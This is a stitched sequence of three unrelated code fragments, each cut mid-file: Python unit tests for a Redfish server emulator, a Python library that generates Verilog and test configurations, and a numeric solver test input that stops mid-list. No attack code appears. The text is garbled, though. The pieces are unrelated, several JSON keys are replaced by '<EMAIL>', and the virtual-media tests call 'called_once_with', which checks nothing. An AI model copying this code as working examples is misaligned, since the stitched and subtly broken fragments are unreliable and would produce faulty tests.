def test_system_resource_patch(self, systems_mock):
data = {'Boot': {'BootSourceOverrideTarget': 'Cd'}}
response = self.app.patch('/redfish/v1/Systems/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(204, response.status_code)
set_boot_device = systems_mock.return_value.set_boot_device
set_boot_device.assert_called_once_with('xxxx-yyyy-zzzz', 'Cd')
@patch_resource('systems')
def test_system_reset_action(self, systems_mock):
set_power_state = systems_mock.return_value.set_power_state
for reset_type in ('On', 'ForceOn', 'ForceOff', 'GracefulShutdown',
'GracefulRestart', 'ForceRestart', 'Nmi'):
set_power_state.reset_mock()
data = {'ResetType': reset_type}
response = self.app.post(
'/redfish/v1/Systems/xxxx-yyyy-zzzz/Actions/'
'ComputerSystem.Reset',
json=data)
self.assertEqual(204, response.status_code)
set_power_state.assert_called_once_with('xxxx-yyyy-zzzz',
reset_type)
@patch_resource('indicators')
@patch_resource('systems')
def test_system_indicator_set_ok(self, systems_mock, indicators_mock):
systems_mock.return_value.uuid.return_value = self.uuid
data = {'IndicatorLED': 'Off'}
response = self.app.patch('/redfish/v1/Systems/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(204, response.status_code)
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.assert_called_once_with(self.uuid, 'Off')
@patch_resource('indicators')
@patch_resource('systems')
def test_system_indicator_set_fail(self, systems_mock, indicators_mock):
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.side_effect = error.FishyError
data = {'IndicatorLED': 'Blah'}
response = self.app.patch('/redfish/v1/Systems/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(500, response.status_code)
class InstanceDeniedTestCase(EmulatorTestCase):
@mock.patch.dict(main.app.config, {}, clear=True)
def test_instance_denied_allow_all(self):
self.assertFalse(main.instance_denied(identity='x'))
@mock.patch.dict(
main.app.config, {'SUSHY_EMULATOR_ALLOWED_INSTANCES': {}})
def test_instance_denied_disallow_all(self):
self.assertTrue(main.instance_denied(identity='a'))
def test_instance_denied_undefined_option(self):
with mock.patch.dict(main.app.config):
main.app.config.pop('SUSHY_EMULATOR_ALLOWED_INSTANCES', None)
self.assertFalse(main.instance_denied(identity='a'))
@mock.patch.dict(
main.app.config, {'SUSHY_EMULATOR_ALLOWED_INSTANCES': {'a'}})
def test_instance_denied_allow_some(self):
self.assertFalse(main.instance_denied(identity='a'))
@mock.patch.dict(
main.app.config, {'SUSHY_EMULATOR_ALLOWED_INSTANCES': {'a'}})
def test_instance_denied_disallow_some(self):
self.assertTrue(main.instance_denied(identity='b'))
@patch_resource('systems')
class BiosTestCase(EmulatorTestCase):
def test_get_bios(self, systems_mock):
systems_mock.return_value.get_bios.return_value = {
"attribute 1": "value 1",
"attribute 2": "value 2"
}
response = self.app.get('/redfish/v1/Systems/' + self.uuid + '/BIOS')
self.assertEqual(200, response.status_code)
self.assertEqual('BIOS', response.json['Id'])
self.assertEqual({"attribute 1": "value 1",
"attribute 2": "value 2"},
response.json['Attributes'])
def test_get_bios_existing(self, systems_mock):
systems_mock.return_value.get_bios.return_value = {
"attribute 1": "value 1",
"attribute 2": "value 2"
}
response = self.app.get(
'/redfish/v1/Systems/' + self.uuid + '/BIOS/Settings')
self.assertEqual(200, response.status_code)
self.assertEqual('Settings', response.json['Id'])
self.assertEqual(
{"attribute 1": "value 1",
"attribute 2": "value 2"},
response.json['Attributes'])
def test_bios_settings_patch(self, systems_mock):
data = {'Attributes': {'key': 'value'}}
response = self.app.patch(
'/redfish/v1/Systems/xxxx-yyyy-zzzz/BIOS/Settings',
json=data)
self.assertEqual(204, response.status_code)
systems_mock.return_value.set_bios.assert_called_once_with(
'xxxx-yyyy-zzzz', {'key': 'value'})
def test_set_bios(self, systems_mock):
data = {'Attributes': {'key': 'value'}}
response = self.app.patch(
'/redfish/v1/Systems/xxxx-yyyy-zzzz/BIOS/Settings',
json=data)
self.assertEqual(204, response.status_code)
systems_mock.return_value.set_bios.assert_called_once_with(
'xxxx-yyyy-zzzz', data['Attributes'])
def test_reset_bios(self, systems_mock):
response = self.app.post('/redfish/v1/Systems/%s/BIOS/Actions/'
'Bios.ResetBios' % self.uuid)
self.assertEqual(204, response.status_code)
systems_mock.return_value.reset_bios.assert_called_once_with(self.uuid)
@patch_resource('systems')
class EthernetInterfacesTestCase(EmulatorTestCase):
def test_ethernet_interfaces_collection(self, systems_mock):
systems_mock.return_value.get_nics.return_value = [
{'id': 'nic1', 'mac': '52:54:00:4e:5d:37'},
{'id': 'nic2', 'mac': '00:11:22:33:44:55'}]
response = self.app.get('redfish/v1/Systems/%s/EthernetInterfaces'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Ethernet Interface Collection',
response.json['Name'])
self.assertEqual(2, response.json['<EMAIL>'])
self.assertEqual(['/redfish/v1/Systems/%s/EthernetInterfaces/nic1'
% self.uuid,
'/redfish/v1/Systems/%s/EthernetInterfaces/nic2'
% self.uuid],
[m['<EMAIL>'] for m in response.json['Members']])
def test_ethernet_interfaces_collection_empty(self, systems_mock):
systems_mock.return_value.get_nics.return_value = []
response = self.app.get('redfish/v1/Systems/%s/EthernetInterfaces'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Ethernet Interface Collection',
response.json['Name'])
self.assertEqual(0, response.json['<EMAIL>'])
self.assertEqual([], response.json['Members'])
def test_ethernet_interface(self, systems_mock):
systems_mock.return_value.get_nics.return_value = [
{'id': 'nic1', 'mac': '52:54:00:4e:5d:37'},
{'id': 'nic2', 'mac': '00:11:22:33:44:55'}]
response = self.app.get('/redfish/v1/Systems/%s/EthernetInterfaces/'
'nic2' % self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('nic2', response.json['Id'])
self.assertEqual('VNIC nic2', response.json['Name'])
self.assertEqual('00:11:22:33:44:55',
response.json['PermanentMACAddress'])
self.assertEqual('00:11:22:33:44:55',
response.json['MACAddress'])
self.assertEqual('/redfish/v1/Systems/%s/EthernetInterfaces/nic2'
% self.uuid,
response.json['@odata.id'])
def test_ethernet_interface_not_found(self, systems_mock):
systems_mock.return_value.get_nics.return_value = [
{'id': 'nic1', 'mac': '52:54:00:4e:5d:37'},
{'id': 'nic2', 'mac': '00:11:22:33:44:55'}
]
response = self.app.get('/redfish/v1/Systems/%s/EthernetInterfaces/'
'nic3' % self.uuid)
self.assertEqual(404, response.status_code)
@patch_resource('vmedia')
@patch_resource('managers')
class VirtualMediaTestCase(EmulatorTestCase):
def test_virtual_media_collection(self, managers_mock, vmedia_mock):
managers_mock = managers_mock.return_value
managers_mock.managers = [self.uuid]
managers_mock.get_manager.return_value = {'UUID': self.uuid}
vmedia_mock.return_value.devices = ['CD', 'Floppy']
response = self.app.get(
'redfish/v1/Managers/%s/VirtualMedia' % self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Virtual Media Services', response.json['Name'])
self.assertEqual(2, response.json['<EMAIL>'])
self.assertEqual(
['/redfish/v1/Managers/%s/VirtualMedia/CD' % self.uuid,
'/redfish/v1/Managers/%s/VirtualMedia/Floppy' % self.uuid],
[m['<EMAIL>'] for m in response.json['Members']])
def test_virtual_media_collection_empty(self, managers_mock, vmedia_mock):
vmedia_mock.return_value.get_devices.return_value = []
response = self.app.get(
'redfish/v1/Managers/' + self.uuid + '/VirtualMedia')
self.assertEqual(200, response.status_code)
self.assertEqual('Virtual Media Services', response.json['Name'])
self.assertEqual(0, response.json['<EMAIL>'])
self.assertEqual([], response.json['Members'])
def test_virtual_media(self, managers_mock, vmedia_mock):
vmedia_mock = vmedia_mock.return_value
vmedia_mock.get_device_name.return_value = 'CD'
vmedia_mock.get_device_media_types.return_value = [
'CD', 'DVD']
vmedia_mock.get_device_image_info.return_value = [
'image-of-a-fish', 'fishy.iso', True, True]
response = self.app.get(
'/redfish/v1/Managers/%s/VirtualMedia/CD' % self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('CD', response.json['Id'])
self.assertEqual(['CD', 'DVD'], response.json['MediaTypes'])
self.assertEqual('fishy.iso', response.json['Image'])
self.assertEqual('image-of-a-fish', response.json['ImageName'])
self.assertTrue(response.json['Inserted'])
self.assertTrue(response.json['WriteProtected'])
def test_virtual_media_not_found(self, managers_mock, vmedia_mock):
vmedia_mock.return_value.get_device_name.side_effect = error.FishyError
response = self.app.get(
'/redfish/v1/Managers/%s/VirtualMedia/DVD-ROM' % self.uuid)
self.assertEqual(404, response.status_code)
def test_virtual_media_insert(self, managers_mock, vmedia_mock):
response = self.app.post(
'/redfish/v1/Managers/%s/VirtualMedia/CD/Actions/'
'VirtualMedia.InsertMedia' % self.uuid,
json={"Image": "http://fish.iso"})
self.assertEqual(204, response.status_code)
vmedia_mock.return_value.insert_image.called_once_with(
'CD', 'http://fish.iso', True, False)
def test_virtual_media_eject(self, managers_mock, vmedia_mock):
response = self.app.post(
'/redfish/v1/Managers/%s/VirtualMedia/CD/Actions/'
'VirtualMedia.EjectMedia' % self.uuid,
json={})
self.assertEqual(204, response.status_code)
vmedia_mock.return_value.eject_image.called_once_with('CD')
@patch_resource('systems')
class StorageTestCase(EmulatorTestCase):
def test_simple_storage_collection(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = {
'virtio': {
'Id': 'virtio',
'Name': 'virtio',
'DeviceList': [
{
'Name': 'testVM1.img',
'CapacityBytes': 100000
},
{
'Name': 'sdb1',
'CapacityBytes': 150000
}
]
},
'ide': {
'Id': 'ide',
'Name': 'ide',
'DeviceList': [
{
'Name': 'testVol1.img',
'CapacityBytes': 200000
},
{
'Name': 'blk-pool0-vol0',
'CapacityBytes': 300000
}
]
}
}
response = self.app.get('redfish/v1/Systems/%s/SimpleStorage'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Simple Storage Collection',
response.json['Name'])
self.assertEqual(2, response.json['<EMAIL>'])
self.assertEqual({'/redfish/v1/Systems/%s/SimpleStorage/virtio'
% self.uuid,
'/redfish/v1/Systems/%s/SimpleStorage/ide'
% self.uuid},
{m['<EMAIL>'] for m in response.json['Members']})
def test_simple_storage_collection_empty(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = []
response = self.app.get('redfish/v1/Systems/%s/SimpleStorage'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Simple Storage Collection',
response.json['Name'])
self.assertEqual(0, response.json['<EMAIL>'])
self.assertEqual([], response.json['Members'])
def test_simple_storage(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = {
'virtio': {
'Id': 'virtio',
'Name': 'virtio',
'DeviceList': [
{
'Name': 'testVM1.img',
'CapacityBytes': 100000
},
{
'Name': 'sdb1',
'CapacityBytes': 150000
}
]
},
'ide': {
'Id': 'ide',
'Name': 'ide',
'DeviceList': [
{
'Name': 'testVol1.img',
'CapacityBytes': 200000
},
{
'Name': 'blk-pool0-vol0',
'CapacityBytes': 300000
}
]
}
}
response = self.app.get('/redfish/v1/Systems/%s/SimpleStorage/virtio'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('virtio', response.json['Id'])
self.assertEqual('virtio Controller', response.json['Name'])
self.assertEqual('testVM1.img', response.json['Devices'][0]['Name'])
self.assertEqual(100000, response.json['Devices'][0]['CapacityBytes'])
self.assertEqual('sdb1', response.json['Devices'][1]['Name'])
self.assertEqual(150000, response.json['Devices'][1]['CapacityBytes'])
self.assertEqual('/redfish/v1/Systems/%s/SimpleStorage/virtio'
% self.uuid,
response.json['@odata.id'])
def test_simple_storage_not_found(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = {
'virtio': {
'Id': 'virtio',
'Name': 'virtio',
'DeviceList': [
{
'Name': 'testVM1.img',
'CapacityBytes': 100000
},
{
'Name': 'sdb1',
'CapacityBytes': 150000
}
]
},
'ide': {
'Id': 'ide',
'Name': 'ide',
'DeviceList': [
{
'Name': 'testVol1.img',
'CapacityBytes': 200000
},
{
'Name': 'blk-pool0-vol0',
'CapacityBytes': 300000
}
]
}
}
response = self.app.get('/redfish/v1/Systems/%s/SimpleStorage/scsi'
% self.uuid)
self.assertEqual(404, response.status_code)
@patch_resource('storage')
def test_storage_collection_resource(self, storage_mock, systems_mock):
storage_mock.return_value.get_storage_col.return_value = [
{
"Id": "1",
"Name": "Local Storage Controller",
"StorageControllers": [
{
"MemberId": "0",
"Name": "Contoso Integrated RAID",
"SpeedGbps": 12
}
]
}
]
response = self.app.get('redfish/v1/Systems/vbmc-node/Storage')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id':
'/redfish/v1/Systems/vbmc-node/Storage/1'},
response.json['Members'][0])
@patch_resource('storage')
def test_storage_resource_get(self, storage_mock, systems_mock):
storage_mock.return_value.get_storage_col.return_value = | |
retreive description of a metric 'm'
try:
return cls.property(m, 'description')
except:
return ''
@classmethod
def value(cls, m): # retreive description of a metric 'm'
return cls.property(m, 'value')
@classmethod
def print_if_exists(cls, statement, m):
'''
Print a Verilog statement if metric m exists.
Note that @@ is replaced with @ in this function.
Therefore do not use this function if the statement has @ for Verilog such as 'always @'
'''
return statement.replace('@@','@') if cls.is_exist(m) else ''
##############################
# Miscellaneous functions
##############################
def get_sensitivity_list():
'''
return default sensitivity list
'''
return REAL.list_optional_pins() + PWL.list_optional_pins_in_real() + LOGIC.list_optional_pins()
def print_sensitivity_list(list_val):
'''
print out sensitivity list in Verilog format
'''
if list_val == []:
return '*'
else:
return ' or '.join(list_val)
def annotate_modelparam(param_map, variable_map={}):
'''
Create verilog statements to back annotate the extracted parameters to variables
param_map = { testname : { testresponse : verilog variable being mapped to }, ... }
variable_map is a dictionary that maps predictor variable in a test to a Verilog variable.
variable_map = { var1 : Verilog_var1, var2 : Verilog_var2, ... }
This will take into account for digital modes as well
'''
#if 'variable_map' not in globals():
# variable_map = {}
digital_modes = ["get_lm_equation_modes('%s', '%s')" % (k, v.keys()[0]) for k,v in param_map.items()]
digital_cases = ['digital_modes[%d][0].keys()' % i for i in range(len(digital_modes))]
vlog_1 = 'digital_modes = [%s]\\n' % ', '.join(digital_modes)
vlog_2 = 'digital_cases = [%s]\\n' % ', '.join(digital_cases)
vlog_3 = 'variable_map = {v_map}\\n'.format(v_map = variable_map)
vlog = '$${\\n' + vlog_1 + vlog_2 + vlog_3 + '}$$\\n'
for i, t in enumerate(param_map.keys()):
vlog += _annotate_verilog_statement(t, param_map[t], i)
return vlog
def _annotate_verilog_statement(testname, param_map_value, case_index):
vlog_statement_template = '''
$$[if not mode_exists('{testname}')]
{vlog_statement1}
$$[else]
case({{$$(','.join({casenumber}))}})
$$[for m in {modenumber}]
{{$$(','.join(["%d'b%s" % (Pin.vectorsize(d), dec2bin('%d'%m[d], Pin.vectorsize(d))) for d in {casenumber}]))}}: begin
{vlog_statement2}
end
$$[end for]
default: begin
{vlog_statement3}
end
endcase
$$[end if]
'''
vlog = ''
template_base = "{variable} = $$get_lm_equation('{testname}', '{response}'"
casenumber = 'digital_cases[%d]' % case_index
modenumber = 'digital_modes[%d]' % case_index
template = template_base + ');'
vlog_statement1 = ' '+'\\n '.join([template.format(variable=v, testname=testname, response=k) for k,v in param_map_value.items()])
template = template_base + ', m);'
vlog_statement2 = ' '+'\\n '.join([template.format(variable=v, testname=testname, response=k) for k,v in param_map_value.items()])
template = template_base + ', %s[0]);' % modenumber
vlog_statement3 = ' '+'\\n '.join([template.format(variable=v, testname=testname, response=k) for k,v in param_map_value.items()])
vlog += vlog_statement_template.format(testname=testname, casenumber=casenumber, modenumber=modenumber, vlog_statement1 = vlog_statement1, vlog_statement2 = vlog_statement2, vlog_statement3 = vlog_statement3)
return vlog
################
# LOGIC-specific
################
class LOGIC(object):
@classmethod
def declare_pin(cls, p, comma=False):
''' print a pin in module declaration. A comma will follow if comma==True '''
return '%s %s %s %s%s // %s' % (Pin.direction(p), Pin.datatype(p), print_bus(Pin.vectorsize(p)), Pin.name(p), ',' if comma else '', Pin.description(p))
@classmethod
def declare_signal(cls, p):
return '%s %s %s;' %(Pin.datatype(p), print_bus(Pin.vectorsize(p)), p)
@classmethod
def list_optional_pins(cls, exclude=[]): # return generic pin names of (digital)
return [p for p in list(set(Pin.list_optional())-set(exclude)) if Pin.datatype(p) in ['logic', '']]
################
# REAL-specific
################
class REAL(object):
@classmethod
def declare_pin(cls, p, comma=False):
''' print a pin in module declaration. A comma will follow if comma==True '''
return '%s %s %s %s%s // %s' % (Pin.direction(p), Pin.datatype(p), print_bus(Pin.vectorsize(p)), Pin.name(p), ',' if comma else '', Pin.description(p))
@classmethod
def declare_signal(cls, p):
return '%s %s %s;' %(Pin.datatype(p), p, print_bus(Pin.vectorsize(p)))
@classmethod
def list_optional_pins(cls, exclude=[]):
'''
Get a list of real signal expressions for optional real analog pins
'''
return [p for p in list(set(Pin.list_optional_analog())-set(exclude)) if Pin.datatype(p)=="real"]
##############
# PWL-specific
##############
class PWL(object):
@classmethod
def declare_pin(cls, p, comma=False):
''' print a pin in module declaration. A comma will follow if comma==True '''
return '%s %s %s %s%s // %s' % (Pin.direction(p), Pin.datatype(p), Pin.name(p), print_bus(Pin.vectorsize(p)), ',' if comma else '', Pin.description(p))
@classmethod
def declare_signal(cls, p):
return '%s %s %s;' %(Pin.datatype(p), p, print_bus(Pin.vectorsize(p)))
@classmethod
def get_real(cls, signame):
'''
Get a real signal expression for given pwl signal name (signame)
'''
return '%s_r' % signame
@classmethod
def list_optional_pins(cls, exclude=[]):
'''
Get a list of real signal expressions for optional pwl analog pins
'''
pl = [p for p in list(set(Pin.list_optional_analog())-set(exclude)) if Pin.datatype(p)=="pwl"]
return map(cls.get_real, pl)
@classmethod
def list_optional_pins_in_real(cls, exclude=[]):
'''
Get a list of real signal expressions for optional pwl analog pins with real suffix
'''
return map(cls.get_real, cls.list_optional_pins())
@classmethod
def instantiate_pwl2real(cls, signame):
'''
Convert PWL waveform to PWC waveform for a given signal name, using pwl2real primitive.
Output "real" signal has the same signal name as its PWL signal, but it will be followed by a suffix "_r"
'''
return 'pwl2real #(.dv(etol_{signal})) xp2r_{signal} (.in({signal}), .out({signal}_r)); // pwl-to-real of {signal}'.format(signal=signame)
@classmethod
def declare_real(cls, sig_list):
'''
Declare the corresponding "real" signal (wire) of a PWL signal
The "real" signal will have the same signal
'''
if len(sig_list) > 0:
return 'real %s;' % ', '.join(sig_list)
else:
return ''
@classmethod
def declare_optional_analog_pins_in_real(cls, exclude=[]):
'''
declare optional analog pins with real datatype suffix
'''
pl_real = list(set(cls.list_optional_pins())-set(exclude))
return cls.declare_real(pl_real)
@classmethod
def instantiate_pwl2real_optional_analog_pins(cls, exclude=[]):
'''
do instantiate_pwl2real for all optional analog pins
'''
pl = [p for p in list(set(Pin.list_optional_analog())-set(exclude)) if Pin.datatype(p)=="pwl"]
_statements = map(cls.instantiate_pwl2real, pl)
return '\\n'.join(_statements)
}@
"""
TEST_PRIMITIVE_FUNCTIONS = """@{
##############################
# test primitive functions
##############################
class Test(object):
@classmethod
def dut(cls): # print dut name
return Module.name()
class TestPort(object):
@classmethod
def declare_optional_pins_prime(cls, port_name, is_digital):
'''
Declare port specifiction in test for given port
'''
if is_digital:
spec = {'port_type': 'digitalmode', 'encode':'binary', 'prohibited': '', 'pinned': 'False', 'default_value': 'b0'}
template = ''' [[[{port_name}]]]
port_type = {port_type}
bit_width = {bit_width}
encode = {encode}
prohibited = {prohibited}
pinned = {pinned}
default_value = {default_value}
description = {description}
'''
else:
spec = {'port_type': 'analoginput', 'regions': '0.0, 1.0', 'pinned': 'False', 'default_value': '0.5'}
template = ''' [[[{port_name}]]]
port_type = {port_type}
regions = {regions}
pinned = {pinned}
default_value = {default_value}
description = {description}
'''
testcfg = ''
spec.update({'port_name': port_name, 'description': Pin.description(port_name)})
if is_digital:
spec.update({'bit_width': Pin.vectorsize(port_name)})
testcfg += template.format(**spec)
return testcfg
@classmethod
def declare_optional_analog_pins(cls, exclude=[]):
'''
Do class.declare_optional_pins_prime for optional analog pins
'''
testcfg = ''
for p in list(set(Pin.list_optional_analog())-set(exclude)):
testcfg += cls.declare_optional_pins_prime(p, False)
return testcfg
@classmethod
def declare_optional_digital_pins(cls, exclude=[]):
'''
Do class.declare_optional_pins_prime for optional digital pins
'''
testcfg = ''
for p in list(set(Pin.list_optional_digital())-set(exclude)):
testcfg += cls.declare_optional_pins_prime(p, True)
return testcfg
@classmethod
def declare_optional_pins(cls, exclude=[]):
'''
Do class.declare_optional_pins_prime for optional analog and digital pins
'''
testcfg = cls.declare_optional_analog_pins(exclude)
testcfg += cls.declare_optional_digital_pins(exclude)
return testcfg
class Testbench(object):
@classmethod
def instantiate_bitvector(cls, signame, bitwidth, value=''):
'''
Instantiate bitvector
bitvector #(.bit_width({bitwidth}), .value(@{signame})) xbv_{signame} (.out({signame}));
'''
if value == '':
value = '@(%s)' % signame
return 'bitvector #(.bit_width({bitwidth}), .value({value})) xbv_{signame} (.out({signame}{bus}));'.format(signame=signame, bitwidth=bitwidth, value=value, bus='[%d:0]' % (Pin.vectorsize(signame)-1) if Pin.vectorsize(signame)>1 else '')
@classmethod
def instantiate_bitvector_optional_pins(cls, exclude=[]):
'''
Do cls._instantiate_bitvector() for all optional digital pins
'''
return '\\n'.join([cls.instantiate_bitvector(p, Pin.vectorsize(p)) for p in Pin.list_optional_digital() if p not in exclude])
@classmethod
def instantiate_vdc(cls, signame, value=''):
'''
Instantiate vdc
For e.g., instantiate_vdc('vin') will produce
vdc #(.dc(@vin)) xvdc_vin (.vout(vin));
'''
if value == '':
value = '@(%s)' % signame
return 'vdc #(.dc({value})) xvdc_{signame} (.vout({signame}));'.format(signame=signame, value=value)
@classmethod
def instantiate_vdc_optional_pins(cls, exclude=[]):
'''
Do cls._instantiate_vdc() for all optional analog voltage pins
'''
return '\\n'.join([cls.instantiate_vdc(p) for p in list(set(Pin.list_optional_analog_voltage()) - set(exclude))])
@classmethod
def instantiate_idc(cls, signame, pnode, nnode, value=''):
'''
Instantiate idc which produces signame
For e.g., instantiate_idc('iin', 'vdd', 'iin') will produce
idc #(.is_n(1), .dc(@iin)) xidc_iin (.outnode(iin), .refnode(vdd));
'''
if value == '':
value = '@(%s)' % signame
return 'idc #(.is_n({direction}), .dc({value})) xidc_{signame} (.outnode({outnode}), .refnode({refnode}));'.format(signame=signame, outnode=signame, refnode=pnode if signame==nnode else nnode if signame==pnode else 'ERROR', direction = '0' if signame==pnode else '1' if signame==nnode else 'ERROR', value=value)
@classmethod
def instantiate_idc_optional_pins(cls, prefnode='vdd', nrefnode='gnd', exclude=[]):
'''
Do cls._instantiate_idc() for all optional analog current pins
'''
return '\\n'.join([cls.instantiate_idc(p, p if Pin.current_direction(p)=='n' else prefnode, p if Pin.current_direction(p)=='p' else nrefnode ) for p in Pin.list_optional_analog_current() if p not in exclude])
@classmethod
def instantiate_idc_on_pin(cls, signame, prefnode='vdd', nrefnode='gnd'):
'''
Do cls._instantiate_idc() for all optional analog current pins
'''
p = signame
return cls.instantiate_idc(p, p if Pin.current_direction(p)=='n' else prefnode, p if Pin.current_direction(p)=='p' else nrefnode)
@classmethod
def dut(cls): # device-under-test
return Test.dut()
@classmethod
def map_by_name(cls, p): # map a pin by name in Verilog
if Pin.vectorsize(p) > 1:
return '.%s(%s%s)' % (Pin.name(p),p,print_bus(Pin.vectorsize(p)))
else:
return '.%s(%s)' % (Pin.name(p),p)
@classmethod
def dut_map_by_name(cls): | |
<reponame>bernardocuteri/wasp
input = """
1 2 0 0
1 3 0 0
1 4 0 0
1 5 0 0
1 6 0 0
1 7 0 0
1 8 0 0
1 9 0 0
1 10 0 0
1 11 0 0
1 12 0 0
1 13 0 0
1 14 0 0
1 15 0 0
1 16 0 0
1 17 0 0
1 18 0 0
1 19 0 0
1 20 0 0
1 21 0 0
1 22 0 0
1 23 0 0
1 24 0 0
1 25 0 0
1 26 0 0
1 27 0 0
1 28 0 0
1 29 0 0
1 30 0 0
1 31 0 0
1 32 0 0
1 33 0 0
1 34 0 0
1 35 0 0
1 36 0 0
1 37 0 0
1 38 0 0
1 39 0 0
1 40 0 0
1 41 0 0
1 42 0 0
1 43 0 0
1 44 0 0
1 45 0 0
1 46 0 0
1 47 0 0
1 48 0 0
1 49 0 0
1 50 0 0
1 51 0 0
1 52 0 0
1 53 0 0
1 54 0 0
1 55 0 0
1 56 0 0
1 57 0 0
1 58 0 0
1 59 0 0
1 60 0 0
1 61 0 0
1 62 0 0
1 63 0 0
1 64 0 0
1 65 0 0
1 66 0 0
1 67 0 0
1 68 0 0
1 69 0 0
1 70 0 0
1 71 0 0
1 72 0 0
1 73 0 0
1 74 0 0
1 75 0 0
1 76 0 0
1 77 0 0
1 78 0 0
1 79 0 0
1 80 0 0
1 81 0 0
1 82 0 0
1 83 0 0
1 84 0 0
1 85 0 0
1 86 0 0
1 87 0 0
1 88 0 0
1 89 0 0
1 90 0 0
1 91 0 0
1 92 0 0
1 93 0 0
1 94 0 0
1 95 0 0
1 96 0 0
1 97 0 0
1 98 0 0
1 99 0 0
1 100 0 0
1 101 0 0
1 102 0 0
1 103 0 0
1 104 0 0
1 105 0 0
1 106 0 0
1 107 0 0
1 108 0 0
1 109 0 0
1 110 0 0
1 111 0 0
1 112 0 0
1 113 0 0
1 114 0 0
1 115 0 0
1 116 0 0
1 117 0 0
1 118 0 0
1 119 0 0
1 120 0 0
1 121 0 0
1 122 0 0
1 123 0 0
1 124 0 0
1 125 0 0
1 126 0 0
1 127 0 0
1 128 0 0
1 129 0 0
1 130 0 0
1 131 0 0
1 132 0 0
1 133 0 0
1 134 0 0
1 135 0 0
1 136 0 0
1 137 0 0
1 138 0 0
1 139 0 0
1 140 0 0
1 141 0 0
1 142 0 0
1 143 0 0
1 144 0 0
1 145 0 0
1 146 0 0
1 147 0 0
1 148 0 0
1 149 0 0
1 150 0 0
1 151 0 0
1 152 0 0
1 153 0 0
1 154 0 0
1 155 0 0
1 156 0 0
1 157 0 0
1 158 0 0
1 159 0 0
1 160 0 0
1 161 0 0
1 162 0 0
1 163 0 0
1 164 0 0
1 165 0 0
1 166 0 0
1 167 0 0
1 168 0 0
1 169 0 0
1 170 0 0
1 171 0 0
1 172 0 0
1 173 0 0
1 174 0 0
1 175 0 0
1 176 0 0
1 177 0 0
1 178 0 0
1 179 0 0
1 180 0 0
1 181 0 0
1 182 0 0
1 183 0 0
1 184 0 0
1 185 0 0
1 186 0 0
1 187 0 0
1 188 0 0
1 189 0 0
1 190 0 0
1 191 0 0
1 192 0 0
1 193 0 0
1 194 0 0
1 195 0 0
1 196 0 0
1 197 0 0
1 198 0 0
1 199 0 0
1 200 0 0
1 201 0 0
1 202 0 0
1 203 0 0
1 204 0 0
1 205 0 0
1 206 0 0
1 207 0 0
1 208 0 0
1 209 0 0
1 210 0 0
1 211 0 0
1 212 0 0
1 213 0 0
1 214 0 0
1 215 0 0
1 216 0 0
1 217 0 0
1 218 0 0
1 219 0 0
1 220 0 0
1 221 0 0
1 222 0 0
1 223 0 0
1 224 0 0
1 225 0 0
1 226 0 0
1 227 0 0
1 228 0 0
1 229 0 0
1 230 0 0
1 231 0 0
1 232 0 0
1 233 0 0
1 234 0 0
1 235 0 0
1 236 0 0
1 237 0 0
1 238 0 0
1 239 0 0
1 240 0 0
1 241 0 0
1 242 0 0
1 243 0 0
1 244 0 0
1 245 0 0
1 246 0 0
1 247 0 0
1 248 0 0
1 249 0 0
1 250 0 0
1 251 0 0
1 252 0 0
1 253 0 0
1 254 0 0
1 255 0 0
1 256 0 0
1 257 0 0
1 258 0 0
1 259 0 0
1 260 0 0
1 261 0 0
1 262 0 0
1 263 0 0
1 264 0 0
1 265 0 0
1 266 0 0
1 267 0 0
1 268 0 0
1 269 0 0
1 270 0 0
1 271 0 0
1 272 0 0
1 273 0 0
1 274 0 0
1 275 0 0
1 276 0 0
1 277 0 0
1 278 0 0
1 279 0 0
1 280 0 0
1 281 0 0
1 282 0 0
1 283 0 0
1 284 0 0
1 285 0 0
1 286 0 0
1 287 0 0
1 288 0 0
1 289 0 0
1 290 0 0
1 291 0 0
1 292 0 0
1 293 0 0
1 294 0 0
1 295 0 0
1 296 0 0
1 297 0 0
1 298 0 0
1 299 0 0
1 300 0 0
1 301 0 0
1 302 0 0
1 303 0 0
1 304 0 0
1 305 0 0
1 306 0 0
1 307 0 0
1 308 0 0
1 309 0 0
1 310 0 0
1 311 0 0
1 312 0 0
1 313 0 0
1 314 0 0
1 315 0 0
1 316 0 0
1 317 0 0
1 318 0 0
1 319 0 0
1 320 0 0
1 321 0 0
1 322 0 0
1 323 0 0
1 324 0 0
1 325 0 0
1 326 0 0
1 327 0 0
1 328 0 0
1 329 0 0
1 330 0 0
1 331 0 0
1 332 0 0
1 333 0 0
1 334 0 0
1 335 2 1 336 337
1 336 2 1 335 337
1 337 0 0
1 338 2 1 339 340
1 339 2 1 338 340
1 340 0 0
1 341 2 1 342 343
1 342 2 1 341 343
1 343 0 0
1 344 2 1 345 346
1 345 2 1 344 346
1 346 0 0
1 347 2 1 348 349
1 348 2 1 347 349
1 349 0 0
1 350 2 1 351 352
1 351 2 1 350 352
1 352 0 0
1 353 2 1 354 355
1 354 2 1 353 355
1 355 0 0
1 356 2 1 357 358
1 357 2 1 356 358
1 358 0 0
1 359 2 1 360 361
1 360 2 1 359 361
1 361 0 0
1 362 2 1 363 364
1 363 2 1 362 364
1 364 0 0
1 365 2 1 366 367
1 366 2 1 365 367
1 367 0 0
1 368 2 1 369 370
1 369 2 1 368 370
1 370 0 0
1 371 2 1 372 373
1 372 2 1 371 373
1 373 0 0
1 374 2 1 375 376
1 375 2 1 374 376
1 376 0 0
1 377 2 1 378 379
1 378 2 1 377 379
